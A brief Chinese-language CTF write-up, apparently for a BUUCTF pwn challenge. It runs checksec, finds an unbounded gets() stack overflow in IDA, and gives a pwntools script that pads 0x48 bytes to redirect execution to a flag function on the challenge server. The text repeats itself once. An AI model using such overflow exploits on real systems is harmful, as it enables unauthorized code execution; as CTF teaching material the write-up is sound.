拿到文件,先checksec,没开启保护。

图片.png
运行,

图片.png
IDA查看,main函数中,可解读,gets没有限制输入长度,存在溢出。

图片.png

图片.png
payload:
from pwn import *
r=remote("node3.buuoj.cn",29434)
flag_addr=0x40060D
payload='a'*(0x40+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()
拿到文件,先checksec,没开启保护。
运行,
IDA查看,main函数中,可解读,gets没有限制输入长度,存在溢出。
payload:
from pwn import *
r=remote("node3.buuoj.cn",29434)
flag_addr=0x40060D
payload='a'*(0x40+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()